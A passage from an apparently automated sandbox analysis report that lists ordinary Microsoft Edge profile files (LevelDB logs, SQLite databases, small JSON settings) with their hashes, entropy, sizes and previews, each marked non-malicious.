                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):321
                                                                                                                                              Entropy (8bit):5.155696138259107
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEruE+q2PRN23oH+Tcwt865IFUtfErg1ZZmw5Erg1zkwORN23oH+Tcwt86+ULJ:7VPE+vaYeb/WFUtf1Z/51z5JYeb/+SJ
                                                                                                                                              MD5:5EB1C5B094DE094FE01A80DD9E3E7F28
                                                                                                                                              SHA1:318FA5472AB56278479FE549E70EB423F11B865F
                                                                                                                                              SHA-256:D7E1D60469956DA1917D8D43A5E931BFE48C17F9BCF0BEFC69B514B3685F3FD4
                                                                                                                                              SHA-512:DCE21134B67777DE96220E6EC8FB1732663B79F370D624C5FE7481991A9DD5693B0CA23A2E7A380587076CE951A5B49F625CAE71AF3766091CE7BF3CEB68ED6C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.105 a44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/03-11:33:57.106 a44 Recovering log #3.2025/01/03-11:33:57.106 a44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):321
                                                                                                                                              Entropy (8bit):5.155696138259107
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVEruE+q2PRN23oH+Tcwt865IFUtfErg1ZZmw5Erg1zkwORN23oH+Tcwt86+ULJ:7VPE+vaYeb/WFUtf1Z/51z5JYeb/+SJ
                                                                                                                                              MD5:5EB1C5B094DE094FE01A80DD9E3E7F28
                                                                                                                                              SHA1:318FA5472AB56278479FE549E70EB423F11B865F
                                                                                                                                              SHA-256:D7E1D60469956DA1917D8D43A5E931BFE48C17F9BCF0BEFC69B514B3685F3FD4
                                                                                                                                              SHA-512:DCE21134B67777DE96220E6EC8FB1732663B79F370D624C5FE7481991A9DD5693B0CA23A2E7A380587076CE951A5B49F625CAE71AF3766091CE7BF3CEB68ED6C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.105 a44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/03-11:33:57.106 a44 Recovering log #3.2025/01/03-11:33:57.106 a44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1254
                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                              MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                              SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                              SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                              SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):317
                                                                                                                                              Entropy (8bit):5.172672616966452
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVE7H1M+q2PRN23oH+Tcwt8NIFUtfErZmw5EmMVkwORN23oH+Tcwt8+eLJ:7VI1M+vaYebpFUtfo/5LMV5JYebqJ
                                                                                                                                              MD5:2A81ECBAD3A0F62642B6227D1F7582AB
                                                                                                                                              SHA1:3EB303404375C84171ACBD11500951060384BD12
                                                                                                                                              SHA-256:879E63682252FE4BC80CAA76900D550144BEBB69D19FDFC8C9A4106817F61A41
                                                                                                                                              SHA-512:82FCF0E8E87DBDBE6D36353F56BF641A9E7A9E0C4E5BB5F512128A75F39EC0B3348319AEF8A6E98E48C9EA5C5583BD4A8CCC0289C2B068714C5C5C35F4F7813C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.616 bfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/03-11:33:57.617 bfc Recovering log #3.2025/01/03-11:33:57.617 bfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):317
                                                                                                                                              Entropy (8bit):5.172672616966452
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVE7H1M+q2PRN23oH+Tcwt8NIFUtfErZmw5EmMVkwORN23oH+Tcwt8+eLJ:7VI1M+vaYebpFUtfo/5LMV5JYebqJ
                                                                                                                                              MD5:2A81ECBAD3A0F62642B6227D1F7582AB
                                                                                                                                              SHA1:3EB303404375C84171ACBD11500951060384BD12
                                                                                                                                              SHA-256:879E63682252FE4BC80CAA76900D550144BEBB69D19FDFC8C9A4106817F61A41
                                                                                                                                              SHA-512:82FCF0E8E87DBDBE6D36353F56BF641A9E7A9E0C4E5BB5F512128A75F39EC0B3348319AEF8A6E98E48C9EA5C5583BD4A8CCC0289C2B068714C5C5C35F4F7813C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.616 bfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/03-11:33:57.617 bfc Recovering log #3.2025/01/03-11:33:57.617 bfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):429
                                                                                                                                              Entropy (8bit):5.809210454117189
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                              MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                              SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                              SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                              SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):155648
                                                                                                                                              Entropy (8bit):0.5773254766166136
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:+HV13WyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE9O0X:+HihH+bDo3iN0Z2TVJkXBBE3ybAbX
                                                                                                                                              MD5:906F42C8A00C0EEADB1469285E44BC17
                                                                                                                                              SHA1:D2AAF35C6C59268F3609B7466FDA80528CDCCECA
                                                                                                                                              SHA-256:B8BC322E4B0ECD849294591123A46D5D62371342B4236F9B19F839F3607B10EA
                                                                                                                                              SHA-512:957F1BB0F38A810D6A7CE55B7EA245758D8515B63BF31C837D45641E6C7803A90F3B031F364484AB0AE35CB32D4C11CEE9F4F2A36C55E94A11D78E5EBDA11C0B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):115717
                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):49152
                                                                                                                                              Entropy (8bit):3.3017513060411012
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:aj9P0rPQkQerkgam6I4P/KbtLcQRKToaAlhI773pLG:adUPe2bIP/NQRKcJ678
                                                                                                                                              MD5:5639B7D42064B013EA97B11C15F2FB16
                                                                                                                                              SHA1:8A202E79913D827FA31D3F447E9E052AB2E7FD48
                                                                                                                                              SHA-256:DEF3B7824480E2445F8D732384757D37832B2EBD56EDC2C9BF2EB0798C2B22D0
                                                                                                                                              SHA-512:65A25AAACBE5E7E9BB48F50A406611D477E89D339C160A5F68D7B33532B13C8E087FF75F4BC32FECA4D9EC2A8F21715554F2A8BECDE07D060E1D54BDABF343BB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):401
                                                                                                                                              Entropy (8bit):5.262749405156958
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7VGEMvaYeb8rcHEZrELFUtfGb/5Gx5JYeb8rcHEZrEZSJ:7VGDaYeb8nZrExgfGdGjJYeb8nZrEZe
                                                                                                                                              MD5:99C7ED48162AA7F9B9FDB4E4B3718179
                                                                                                                                              SHA1:A2368A58629C7029FB740667325C4DEF0E128778
                                                                                                                                              SHA-256:D1DCAC4F3D2C207823CECE188D3C1DF4D5E1D48A2ECEFA07FD3A2A040C6D542B
                                                                                                                                              SHA-512:C54E37C56EAF6C52664049B780F06EEA53D59C6285C57717D34062850C44D51D5B5E64878D629B18C5B77C4313FCA5819D81277D0B63A83872002079C17CA3D0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:58.008 968 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/03-11:33:58.009 968 Recovering log #3.2025/01/03-11:33:58.009 968 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):401
                                                                                                                                              Entropy (8bit):5.262749405156958
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:7VGEMvaYeb8rcHEZrELFUtfGb/5Gx5JYeb8rcHEZrEZSJ:7VGDaYeb8nZrExgfGdGjJYeb8nZrEZe
                                                                                                                                              MD5:99C7ED48162AA7F9B9FDB4E4B3718179
                                                                                                                                              SHA1:A2368A58629C7029FB740667325C4DEF0E128778
                                                                                                                                              SHA-256:D1DCAC4F3D2C207823CECE188D3C1DF4D5E1D48A2ECEFA07FD3A2A040C6D542B
                                                                                                                                              SHA-512:C54E37C56EAF6C52664049B780F06EEA53D59C6285C57717D34062850C44D51D5B5E64878D629B18C5B77C4313FCA5819D81277D0B63A83872002079C17CA3D0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:58.008 968 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/03-11:33:58.009 968 Recovering log #3.2025/01/03-11:33:58.009 968 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):332
                                                                                                                                              Entropy (8bit):5.126925141824807
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVErcLq2PRN23oH+Tcwt8a2jMGIFUtfEYaZZmw5ETEFkwORN23oH+Tcwt8a2jM4:7VJLvaYeb8EFUtfAZ/5pF5JYeb8bJ
                                                                                                                                              MD5:C00CC6984BBA4013D9B956CF18A42973
                                                                                                                                              SHA1:CC883525FA66A2AC21F43B2FCA1C5BF4464039B4
                                                                                                                                              SHA-256:F7A37347158F856036141A5A7118B3105DE121FA18759C4D25850353597C9E3B
                                                                                                                                              SHA-512:50BDF9A92AA803F59AC69D07714D445519EAF6EAD87E56969B756B30CE143802DB09AEF4C05DC65E8ADB285848DB72C0E5204F38DFA69BB97C48CF5CB7A49DD0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.198 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/03-11:33:57.200 1e54 Recovering log #3.2025/01/03-11:33:57.203 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):332
                                                                                                                                              Entropy (8bit):5.126925141824807
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:iOVErcLq2PRN23oH+Tcwt8a2jMGIFUtfEYaZZmw5ETEFkwORN23oH+Tcwt8a2jM4:7VJLvaYeb8EFUtfAZ/5pF5JYeb8bJ
                                                                                                                                              MD5:C00CC6984BBA4013D9B956CF18A42973
                                                                                                                                              SHA1:CC883525FA66A2AC21F43B2FCA1C5BF4464039B4
                                                                                                                                              SHA-256:F7A37347158F856036141A5A7118B3105DE121FA18759C4D25850353597C9E3B
                                                                                                                                              SHA-512:50BDF9A92AA803F59AC69D07714D445519EAF6EAD87E56969B756B30CE143802DB09AEF4C05DC65E8ADB285848DB72C0E5204F38DFA69BB97C48CF5CB7A49DD0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:2025/01/03-11:33:57.198 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/03-11:33:57.200 1e54 Recovering log #3.2025/01/03-11:33:57.203 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):40
                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):111
                                                                                                                                              Entropy (8bit):4.718418993774295
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                              MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                              SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                              SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                              SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):111
                                                                                                                                              Entropy (8bit):4.718418993774295
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                              MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                              SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                              SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                              SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                              Category:modified
                                                                                                                                              Size (bytes):36864
                                                                                                                                              Entropy (8bit):1.1148217860936975
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBiTU:uIEumQv8m1ccnvS69+cI91B1a
                                                                                                                                              MD5:D23E050CD891BF79DE0A435C65B020BE
                                                                                                                                              SHA1:91CC2811FEDC464511C9D03E63DC1F42792C1057
                                                                                                                                              SHA-256:2C4828A54C96491DD52BF41CC845D0B5D89A72A6D393335C5D17E9020F345E88
                                                                                                                                              SHA-512:A40C5B34F7916397A757B61F9435042880C03FC4410201E5721236C8FC8F6C211AA8C2AA5C133EC267821E4F508F2C6984038B5B5AA0B91F5094E60B5D41C120
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2
                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[]
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
